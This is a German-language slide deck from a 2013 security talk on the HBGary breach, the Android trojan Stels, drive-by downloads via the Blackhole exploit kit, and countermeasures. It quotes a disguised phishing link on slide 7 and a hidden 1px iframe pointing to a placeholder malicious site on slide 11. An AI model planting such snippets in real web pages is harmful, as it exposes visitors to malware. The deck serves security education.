[1]

Aktuelle IT-Sicherheitsrisiken in der Praxis

Datenschutz und IT-Sicherheit - 5. November 2013,Dipl. Ing. Dr. Ulrich Bayer, SBA Research

[2]

Agenda

• Fallbeispiel: Hack eines US-Unternehmens

• Fallbeispiel: Malware Auf Android

Auf Windows

Malware Verbreitung via

•Social Engineering

•Exploits (Drive-By Downloads)

[3]

Hack von HBGary (2011)

• Vorspiel:

Regierungsnahes US Beratungsunternehmen

CEO äußert sich aggressiv gegen „Hackergruppen“

• Eigenes CMS, entwickelt von Dritthersteller

• Parameter auf Homepage anfällig für SQL Injection

Userdaten werden ausgelesen

http://www.hbgaryfederal.com/pages.php?pageNav=2&page=27

• Passwörter durch MD5 gehasht

Rainbow Tables für MD5

Hashwerte nicht gesalzen und keine Iteration des Hashvorgangs

md5(password)

1/3

[4]

Hack von HBGary (2011)

• Keine ausreichende Passwort Policy Sehr kurze Passwörter Passwörter von CEO und COO : 6 Kleinbuchstaben und 2

Ziffern (z.B. tkdfef56)

• Gleiches Passwort bei mehreren Services benutzt Mehrere Services werden durch 1 Hack betroffen

(Seiteneffekte!) Bei HBGary wurde das 8 stellige Passwort auch bei SSH,

Twitter und zur Verwaltung der Google Servicekonten verwendet

• Altes Betriebssystem (Linux) mit bekannter Privilege Escalation Lücke verwendet

Nach SSH Login mit „normalem“ Benutzerkonto => root

2/3

[5]

Hack von HBGary (2011)

• Verhindern von SQL-Injections

• Firmenweite, sichere Passwort Policy einführen z.B. Mindestlänge 12 Zeichen; Mix aus Groß- und Kleinbuchstaben,

Nummern und Sonderzeichen

Mitarbeiter auffordern, Passwörter nicht mehrmals zu verwenden

• Sicheres Passwort-hashing

• Patch-Management Anwendungen und Systeme auf neuestem Stand halten

• Sicherheitsbewusstsein der Mitarbeiter schärfen Schulungen, Workshops, …

• Usw…

SSH-Zugang über Public Key Kryptographie

3/3 – Wie hätte man den Hack verhindern können?

[6]

Fallbeispiel

• Erstmalig entdeckt März 2013

• Verbreitung von Android Malware oft über (alternative) Appstores

0.02% offizieller Android Market

0.20% bis 0.47% bei alternativen Marktplätzen (Zhou, Ndss 12)

• Bei Stels via Phishing Emails (Cutwail botnet)

• Öffnet backdoor, stiehlt Informationen

• Android package mit Namen FLASHPLAYER.UPDATE

Android Trojaner Stels

[7]

Cutwail Spam KampageZu Beginn: Eine Spam-Mail

Quelle: Dell SecureWorks

<a href='http://a_compromised_site.com/'> http://www.irs.gov/pub/irs-pdf/forms2012</a>

[8]

Auf Android - GerätenMalware tarnt sich als Flash.

Quelle: Dell SecureWorks

[9]

Android InstallationsdialogNachfrage, ob die Software installiert werden soll

Quelle: Dell SecureWorks

[10]

Anzeichen von StelsNach der Installation

Einmalige Anzeige des App-Symbols unter installierten Applikationen

Laufende Prozesse

Quelle: Dell SecureWorks

[11]

Bei Web-BrowserGefälschte IRS Webseite für IE, Firefox, Opera

Quelle: Dell SecureWorks

<li><iframe src=“http://malicious_site.com” width=“1px” height=“1px” /></li>

[12]

“Bösartige“ Webseite

• Bösartige Seite prüft nach Sicherheitsschwachstellen

• Browser und Browserplugins haben Bugs (Abstürze, Anzeigefehler)

immer wieder auch Sicherheitsprobleme

Sicherheitsschwachstellen ermöglichen Angriffe

• Drive-by-Download Unwissentlicher Download und Installation eines (Malware-)

Programms

Möglich aufgrund von einer Sicherheitsschwachstelle im Browser

• Im Fall von Stels: Redirect auf Webseite mit Blackhole Exploit Kit

Was kann beim Ansurfen einer Webseite schon passieren?

[13]

BlackHole

• Das verbreiteteste Exploit Kit

• Exploit Kit: Kommerzielle kriminelle Software zur

Verbreitung von Malware via Drive-By-Downloads

Kommt mit einer Sammlung an Exploits

Nutzen unterschiedlichste Webbrowser-Schwachstellen aus

Durch Drive-by-Downloads wird das Schadprogramm ohne Wissen des Anwenders auf den Computer heruntergeladen

• Erscheinung: 2011

• Kosten: $1500 und mehr

[14]

Blackhole Administration Panel

Anzahl infizierter PCs

Erfolgsquote

Angewandte Exploits

[15]

Bei anderen WebbrowsernAffiliate scam

Quelle: Dell SecureWorks

[16]

Fähigkeiten von Stels

• Download und Ausführen von Dateien

• Stehlen der Kontaktliste

• Berichten von Systeminformationen (Telefonnummer, IMEI etc.)

• Telefonanrufe machen

• SMS Nachrichten schicken

• Monitor and record SMS messages

• Benachrichtigungen anzeigen

• Applikationen deinstallieren

Funktioniert auf fast allen Android-Versionen

[17]

Schutzmaßnahmen

• Applikationen besser nur vom Android Appstore installieren

• Im Zweifel die Rechte analysieren INTERNET, READ_LOGS

• Allgemein Misstrauen gegenüber Links und Attachments in

E-Mails

SMS

Instant Messages

Unter Android

[18]

AndroidOption, um unter Android Apps aus anderen Quellen zu installieren

[19]

Schutzmaßnahmen

• Software aktuell halten Vor allem den Browser

•IE (Microsoft Update)

•Chrome, Firefox (prüfen selbsttätig)

Betriebssystem (Microsoft Update)

Browser-Plugins

•Online-Check für alle Browser hier möglich:https://www.mozilla.org/plugincheck/

• Einsatz von Antivirus Software sinnvoll

Für Desktop PCs

[20]

Sind meine Browser-Plugins aktuell?

[21]

Zusammenfassung

• Unsichere Webapplikation

• Veraltete Standardsoftware (Linux)

• Ausweitung des Angriffs durch mehrfach verwendete Passwörter

Fallbeispiel: Hack eines Unternehmens

[22]

Zusammenfassung

• Spam für Opfer verschiedener Betriebssysteme

• Kompromittierte Server zur Verbreitung von Drive-By Downloads

Warum werden manchmal kleine Webseiten gehackt?

Fallbeispiel: Malware

Quelle: Google Transparency Report

[23]

Fragen?

• Vielen Dank für die Aufmerksamkeit!